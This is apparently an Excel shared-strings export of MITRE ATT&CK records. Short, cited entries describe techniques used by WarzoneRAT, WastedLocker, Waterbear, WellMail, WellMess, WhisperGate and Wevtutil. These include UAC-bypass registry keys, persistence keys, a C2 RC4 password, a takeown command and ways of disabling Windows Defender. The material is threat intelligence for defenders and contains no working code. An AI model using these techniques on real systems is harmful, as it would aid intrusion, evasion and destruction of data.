    <t>relationship--d6624fc4-3aed-47c9-a4d9-aafc008f876f</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can masquerade the Process Environment Block on a compromised host to hide it's attempts to elevate privileges through `IFileOperation`.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--5bceaa15-bfcf-464f-a3d3-030d389080b5</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can download and execute additional files.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--2f081501-0c5c-4662-b7b4-3dc5a8a3b1af</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</si>
  <si>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</si>
  <si>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relationship--0b3b2d98-213c-487f-b526-9336c2ed4555</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) has relied on a victim to open a malicious attachment within an email for execution.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>relationship--1873a6d4-fc01-4fd5-aa85-ded977998eab</t>
  </si>
  <si>
    <t xml:space="preserve">[WarzoneRAT](https://attack.mitre.org/software/S0670) can create `HKCU\Software\Classes\Folder\shell\open\command` as a new registry key during privilege escalation.(Citation: Uptycs Warzone UAC Bypass November 2020)(Citation: Check Point Warzone Feb 2020) </t>
  </si>
  <si>
    <t>relationship--42a2aec6-4efb-44d0-8ae8-32a208c05da6</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can use a variety of API calls on a compromised host.(Citation: Uptycs Warzone UAC Bypass November 2020)</t>
  </si>
  <si>
    <t>relationship--9e9daac0-86ce-493f-a1b4-6c4e9d0e39ff</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can communicate with its C2 server via TCP over port 5200.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--d580bb98-25fb-4cf4-9b3f-79b007939202</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can use PowerShell to download files and execute commands.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)</t>
  </si>
  <si>
    <t>relationship--8432770c-a920-43dc-855c-216320a70a88</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can obtain a list of processes on a compromised host.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--057815bb-550c-4e00-bfdb-c7e4bf6461cb</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) has the ability to inject malicious DLLs into a specific process for privilege escalation.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--b27650da-9a26-4bd3-9e9e-2559a0b6dc86</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) has the capability to act as a reverse proxy.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--384c2ef7-ae14-4ba2-ad86-bfeea3c14f33</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can add itself to the `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UIF2IS20VK` Registry keys.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--0f90920b-ab2e-4c79-95a5-5438c172a46d</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) has the ability to control an infected PC using RDP.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--419d663c-0fa5-411c-9697-468debf7efc5</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can include a rootkit to hide processes, files, and startup.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--eeb368b7-52b9-4320-a34f-8f3235beb22f</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) has been distributed as a malicious attachment within an email.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>relationship--73e00ae6-71f1-4ad7-861a-f0643b42c2ac</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can encrypt its C2 with RC4 with the password `warzone160\x00`.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--3db5259f-5426-4c47-8fc3-44118f63f985</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can collect compromised host information, including OS version, PC name, RAM size, and CPU details.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--384b6787-f69b-4d81-bc5e-c01a5c5b026e</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) has been install via template injection through a malicious DLL embedded within a template RTF in a Word document.(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>relationship--d04d88d0-541d-4da2-ac58-888f1d418f20</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) has the ability of performing remote desktop access via a VNC console.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--cf546d75-f689-4033-83eb-40a3edd71877</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can access the webcam on a victim's machine.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)</t>
  </si>
  <si>
    <t>relationship--aba4daa2-5022-4fe9-8359-7c0af1f58b86</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can use `cmd.exe` to execute malicious code.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--cd6d8071-bcca-45ee-a477-3547d23d7758</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) contains junk code to increase its entropy and hide the actual code.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--97aa311a-04b1-473f-a298-1d230c82e881</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) can perform a UAC bypass if it is not executed with administrator rights or if the infected host runs Windows Vista or later.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--7fff37e5-a123-4d85-850e-7745d1e18650</t>
  </si>
  <si>
    <t xml:space="preserve"> [WastedLocker](https://attack.mitre.org/software/S0612) has performed DLL hijacking before execution.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--ae48c7b6-5d12-4526-bf78-79fdf14544dc</t>
  </si>
  <si>
    <t xml:space="preserve">[WastedLocker](https://attack.mitre.org/software/S0612) can encrypt data and leave a ransom note.(Citation: Symantec WastedLocker June 2020)(Citation: NCC Group WastedLocker June 2020)(Citation: Sentinel Labs WastedLocker July 2020) </t>
  </si>
  <si>
    <t>relationship--6c1ca5ac-fa01-44f3-997c-ef8b28dc22f3</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612)'s custom cryptor, CryptOne, used an XOR based algorithm to decrypt the payload.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--c9ebddf7-337f-4002-84fd-84a7744b78e1</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) can enumerate files and directories just prior to encryption.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--b580bd73-72e4-479a-b8c8-221e12dc00db</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) has copied a random file from the Windows System32 folder to the &lt;code&gt;%APPDATA%&lt;/code&gt; location under a different hidden filename.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--22507af4-0701-4ebe-99b1-153cf803f829</t>
  </si>
  <si>
    <t xml:space="preserve">[WastedLocker](https://attack.mitre.org/software/S0612) can delete shadow volumes.(Citation: Symantec WastedLocker June 2020)(Citation: NCC Group WastedLocker June 2020)(Citation: Sentinel Labs WastedLocker July 2020) </t>
  </si>
  <si>
    <t>relationship--2781807b-4dd7-4bd7-b453-bd258bc375ee</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) can modify registry values within the &lt;code&gt;Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap&lt;/code&gt; registry key.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--519beaec-1b79-42d7-9739-8c22e896e0cd</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) has the ability to save and execute files as an alternate data stream (ADS).(Citation: Sentinel Labs WastedLocker July 2020)</t>
  </si>
  <si>
    <t>relationship--c3e7ca65-d0b0-43bd-ae13-047c361f3a79</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612)'s custom crypter, CryptOne, leveraged the VirtualAlloc() API function to help execute the payload.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--abbd6d5f-03a0-4e3c-b362-178879cfa016</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) can identify network adjacent and accessible drives.(Citation: Sentinel Labs WastedLocker July 2020)</t>
  </si>
  <si>
    <t>relationship--c6f2a62f-3aae-4245-8477-4d2ae96498d8</t>
  </si>
  <si>
    <t xml:space="preserve">The [WastedLocker](https://attack.mitre.org/software/S0612) payload includes encrypted strings stored within the .bss section of the binary file.(Citation: NCC Group WastedLocker June 2020)   </t>
  </si>
  <si>
    <t>relationship--d67e450d-8b3c-4b6b-8213-c29223a7f4d6</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) can enumerate removable drives prior to the encryption process.(Citation: Sentinel Labs WastedLocker July 2020)</t>
  </si>
  <si>
    <t>relationship--a6959fa0-405c-49b9-983e-653569247dbd</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) checks for specific registry keys related to the &lt;code&gt;UCOMIEnumConnections&lt;/code&gt; and &lt;code&gt;IActiveScriptParseProcedure32&lt;/code&gt; interfaces.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--9677d051-2bac-4686-8611-2d089d3d4b58</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) can execute itself as a service.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--ceadf11d-d89c-4ec6-a7a2-fe842570bb4c</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) checked if UCOMIEnumConnections and IActiveScriptParseProcedure32 Registry keys were detected as part of its anti-analysis technique.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--64c2c440-287d-409a-b6f3-8ef837346ad0</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) has used [cmd](https://attack.mitre.org/software/S0106) to execute commands on the system.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--739b4be2-ad4d-4a40-997f-958292c860a1</t>
  </si>
  <si>
    <t xml:space="preserve">[WastedLocker](https://attack.mitre.org/software/S0612) has a command to take ownership of a file and reset the ACL permissions using the &lt;code&gt;takeown.exe /F filepath&lt;/code&gt; command.(Citation: NCC Group WastedLocker June 2020) </t>
  </si>
  <si>
    <t>relationship--e9cd867a-074c-4fca-8184-e6adad66af0f</t>
  </si>
  <si>
    <t xml:space="preserve">[WastedLocker](https://attack.mitre.org/software/S0612) created and established a service that runs until the encryption process is complete.(Citation: NCC Group WastedLocker June 2020) </t>
  </si>
  <si>
    <t>relationship--0f42474f-27d5-4939-8f18-348b8d09a9b6</t>
  </si>
  <si>
    <t xml:space="preserve">[Waterbear](https://attack.mitre.org/software/S0579) has used DLL side loading to import and load a malicious DLL loader.(Citation: Trend Micro Waterbear December 2019) </t>
  </si>
  <si>
    <t>relationship--44bbd0e1-acdf-458c-934c-a64e8a7a371c</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) has the ability to decrypt its RC4 encrypted payload for execution.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>relationship--6e73108a-836f-47ad-b88a-6b9a70ebcb7b</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can hook the &lt;code&gt;ZwOpenProcess&lt;/code&gt; and &lt;code&gt;GetExtendedTcpTable&lt;/code&gt; APIs called by the process of a security product to hide PIDs and TCP records from detection.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>relationship--db963d57-c16f-4a69-92f3-fce8d25ab93d</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can scramble functions not to be executed again with random values.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>relationship--e041070a-ff38-47ee-aebd-8d1bc714231e</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can receive and load executables from remote C2 servers.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>relationship--5c3a903f-5934-48ec-84da-e88e0d1b4e68</t>
  </si>
  <si>
    <t xml:space="preserve">[Waterbear](https://attack.mitre.org/software/S0579) has deleted certain values from the Registry to load a malicious DLL.(Citation: Trend Micro Waterbear December 2019) </t>
  </si>
  <si>
    <t>relationship--631ba90c-982c-4415-a13c-75cf06e53252</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can leverage API functions for execution.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>relationship--dfcfd396-1c1f-42c0-ad12-da75d275ccc9</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) has used RC4 encrypted shellcode and encrypted functions.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>relationship--7b6c1b21-67e7-4930-82e3-8b13d8aac0ce</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can identify the process for a specific security product.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>relationship--d9b4c254-8e05-4410-ae4d-a47f55e6bf51</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can inject decrypted shellcode into the LanmanServer service.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>relationship--56e0b679-1c1b-4c82-9346-bde619c21117</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can query the Registry key &lt;code&gt;"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI"&lt;/code&gt; to see if the value `OracleOcilib` exists.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>relationship--93741cce-12ce-4cc0-9fa6-5db7d8a1309a</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can find the presence of a specific security software.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>relationship--9b8341df-94d6-4989-9662-9af1b2233036</t>
  </si>
  <si>
    <t xml:space="preserve">[Waterbear](https://attack.mitre.org/software/S0579) can use API hooks on `GetExtendedTcpTable` to retrieve a table containing a list of TCP endpoints available to the application.(Citation: Trend Micro Waterbear December 2019) </t>
  </si>
  <si>
    <t>relationship--88d6a08e-2e96-41de-868f-b41c07d11541</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can use thread injection to inject shellcode into the process of security software.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>relationship--4aa3b66d-f312-4f1f-912a-b7b1762f9d82</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can archive files on the compromised host.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>relationship--423b6f97-96c5-47f3-aa9f-f27bf5cd1ba0</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can use hard coded client and certificate authority certificates to communicate with C2 over mutual TLS.(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>relationship--ea8e9109-739f-485c-8d13-fb5ed6b2fdcd</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can exfiltrate files from the victim machine.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>relationship--ecb7a35e-cc83-4b7d-9eb6-42d0bd7d5d9e</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can decompress scripts received from C2.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>relationship--a511a41e-0ab0-4088-8617-5de975b5d9a8</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can receive data and executable scripts from C2.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>relationship--05dc9f8c-a1ea-4cdf-ae86-e98af40d5bd7</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can use TCP for C2 communications.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>relationship--5be3684a-cb63-4328-bba0-22f14298b920</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) has been observed using TCP port 25, without using SMTP, to leverage an open port for secure command and control communications.(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>relationship--31b54e57-8a8c-4c0f-9170-b3694dd82005</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can identify the IP address of the victim system.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>relationship--818d3d9c-0734-4e05-9ce2-1cf7c2edb5d5</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can identify the current username on the victim system.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>relationship--731c3fa1-2af3-4b6e-ad0d-7942e8e966fb</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can communicate to C2 with mutual TLS where client and server mutually check certificates.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>relationship--69d3a1fc-f72f-4fd9-aa89-c6a471791421</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) has the ability to use DNS tunneling for C2 communications.(Citation: PWC WellMess July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>relationship--4f7ce20c-fab3-4dbd-be9f-c023d7b0bd90</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can send files from the victim machine to C2.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>relationship--45eda154-7d5b-406d-b4eb-8d1ba2b79f40</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can decode and decrypt data received from C2.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>relationship--c958d98c-d3d9-40cf-9702-5d9cb2cdf719</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can identify domain group membership for the current user.(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>relationship--a8b6a519-2159-46f0-916d-1f7a3d940eea</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can write files to a compromised host.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>relationship--6204f142-a2a7-406f-9874-af8f3bb9dca9</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can use junk data in the Base64 string for additional obfuscation.(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>relationship--ef407819-f7e3-477c-8586-42ba108e5786</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can execute PowerShell scripts received from C2.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>relationship--32be4e3c-fa7f-4ec5-abee-2ed631d0494a</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) has used Base64 encoding to uniquely identify communication to and from the C2.(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>relationship--86dddc68-9032-4467-be3c-a48d3bacfd06</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can encrypt HTTP POST data using RC6 and a dynamically generated AES key encrypted with a hard coded RSA public key.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>relationship--90ca7f0e-f0fd-47d5-9d40-8ae6d77c0897</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can identify the computer name of a compromised host.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>relationship--5e967f56-9186-43d5-b748-4ee383df4174</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can identify the IP address and user domain on the target machine.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>relationship--b02c36d6-1027-4f11-98dc-ee4ef00a0b8b</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can collect the username on the victim machine to send to C2.(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>relationship--0b126adc-3173-4751-978f-96b72913a346</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can use HTTP and HTTPS in C2 communications.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>relationship--eda172f0-188d-4ca6-9a10-a90786127b68</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can execute command line scripts received from C2.(Citation: PWC WellMess July 2020)</t>
  </si>
  <si>
    <t>relationship--90f294ee-9232-4392-9c9a-124be3f38e06</t>
  </si>
  <si>
    <t>[Wevtutil](https://attack.mitre.org/software/S0645) can be used to clear system and security event logs from the system.(Citation: Wevtutil Microsoft Documentation)(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>relationship--3fa2041f-f2dc-4fa6-8e01-f0bb065f8ca0</t>
  </si>
  <si>
    <t>[Wevtutil](https://attack.mitre.org/software/S0645) can be used to export events from a specific log.(Citation: Wevtutil Microsoft Documentation)(Citation: F-Secure Lazarus Cryptocurrency Aug 2020)</t>
  </si>
  <si>
    <t>relationship--9c559e9a-0ad1-42cb-9848-5b54112a543b</t>
  </si>
  <si>
    <t>[Wevtutil](https://attack.mitre.org/software/S0645) can be used to disable specific event logs on the system.(Citation: Wevtutil Microsoft Documentation)</t>
  </si>
  <si>
    <t>relationship--5b125600-b528-49d4-9d1b-28eae9f8c8a9</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</si>
  <si>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</si>
  <si>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relationship--03ecffe3-d09c-40f5-bbc8-ffa4acc4bdb4</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</si>
  <si>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</si>
  <si>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relationship--b0ecee81-0bbe-4ab9-9618-b245656aabc4</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</si>
  <si>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</si>
  <si>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relationship--13576b41-ec77-418c-b581-d3fa461df941</t>
  </si>
  <si>
    <t>10 March 2022</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can deobfuscate downloaded files stored in reverse byte order and decrypt embedded resources using multiple XOR operations.(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>relationship--c89f4447-e8dc-4b6f-aa52-fade3ced3268</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</si>
  <si>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</si>
  <si>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relationship--39c01421-4f72-4143-95e1-fa8b209a5be6</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can overwrite sectors of a victim host's hard drive at periodic offsets.(Citation: Crowdstrike WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>relationship--774a6b5c-bbba-4094-bac3-0fa5e664bf2a</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</si>
  <si>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</si>
  <si>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relationship--76e8bb0f-83a5-462b-8f7d-3369da104e67</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can delete tools from a compromised host after execution.(Citation: Cisco Ukraine Wipers January 2022)</t>
  </si>
  <si>
    <t>relationship--6d216f28-e5e1-4d73-abd9-b08f370f9d2b</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</si>
  <si>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</si>
  <si>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relationship--2bce15a3-cf65-48a5-8a07-1c85c9c33a1a</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</si>
  <si>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</si>
  <si>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relationship--f099adef-7e4e-4b52-b4fa-27f7db8389f3</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) has used `InstallUtil.exe` as part of its process to disable Windows Defender.(Citation: Unit 42 WhisperGate January 2022)</t>
  </si>
  <si>
    <t>relationship--4854028c-5924-478c-b274-a37f3ad5d7d2</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) has been disguised as a JPG extension to avoid detection as a malicious PE file.(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>relationship--d4e0558a-83e2-4d99-bc80-aff1bb367724</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) has used the `ExitWindowsEx` to flush file buffers to disk and stop running processes and other API calls.(Citation: Cisco Ukraine Wipers January 2022)(Citation: RecordedFuture WhisperGate Jan 2022)</t>
  </si>
  <si>
    <t>relationship--5580b0f6-7679-46c3-adb5-270c87f8ef69</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can enumerate connected remote logical drives.(Citation: Cisco Ukraine Wipers January 2022)</t>
  </si>
  <si>
    <t>relationship--8c263b12-46f5-452c-908e-3bc80fba3bf5</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</si>
  <si>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</si>
  <si>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relationship--4d10ce98-d1c1-4e26-84c3-a309e7c30313</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can use PowerShell to support multiple actions including execution and defense evasion.(Citation: Unit 42 WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>relationship--375253bd-1832-4177-a1b1-92b42a6a599b</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) has the ability to inject its fourth stage into a suspended process created by the legitimate Windows utility `InstallUtil.exe`.(Citation: Cisco Ukraine Wipers January 2022)(Citation: RecordedFuture WhisperGate Jan 2022)</t>
  </si>
  <si>
    <t>relationship--9d53b4b9-999a-48e9-b90f-0030bbdae18d</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689)'s downloader can reverse its third stage file bytes and reflectively load the file as a .NET assembly.(Citation: RecordedFuture WhisperGate Jan 2022)</t>
  </si>
  <si>
    <t>relationship--0a2872da-8858-45d4-bd78-8ac41fc376eb</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can recognize the presence of monitoring tools on a target system.(Citation: Unit 42 WhisperGate January 2022)</t>
  </si>
  <si>
    <t>relationship--7de5afb6-3dbf-4c9a-876f-1f7a4aa9d4e0</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can download and execute AdvancedRun.exe via `sc.exe`.(Citation: Medium S2W WhisperGate January 2022)(Citation: Unit 42 WhisperGate January 2022)</t>
  </si>
  <si>
    <t>relationship--90febb12-39b4-4138-99da-93f1e987ac2a</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can stop its execution when it recognizes the presence of certain monitoring tools.(Citation: Unit 42 WhisperGate January 2022)</t>
  </si>
  <si>
    <t>relationship--7976b353-f509-440f-a620-72116e06c30a</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) has the ability to enumerate fixed logical drives on a targeted system.(Citation: Cisco Ukraine Wipers January 2022)</t>
  </si>
  <si>
    <t>relationship--b5a1d3dd-89ea-442a-8695-1aea2cbccafa</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can shutdown a compromised host through execution of `ExitWindowsEx` with the `EXW_SHUTDOWN` flag.(Citation: Cisco Ukraine Wipers January 2022)</t>
  </si>
  <si>
    <t>relationship--97453382-d064-4705-9a63-b21356d4bfce</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can pause for 20 seconds to bypass antivirus solutions.(Citation: Medium S2W WhisperGate January 2022)(Citation: RecordedFuture WhisperGate Jan 2022)</t>
  </si>
  <si>
    <t>relationship--be51a4cd-8e2b-4605-9f8d-35e4689704f4</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can use a Visual Basic script to exclude the `C:\` drive from Windows Defender.(Citation: Unit 42 WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)</t>
  </si>
  <si>
    <t>relationship--af939bf8-559a-494c-ad06-fb3a8b3e0e18</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can make an HTTPS connection to download additional files.(Citation: Unit 42 WhisperGate January 2022)(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>relationship--62c20028-7476-4358-8384-93d40cb65222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</si>
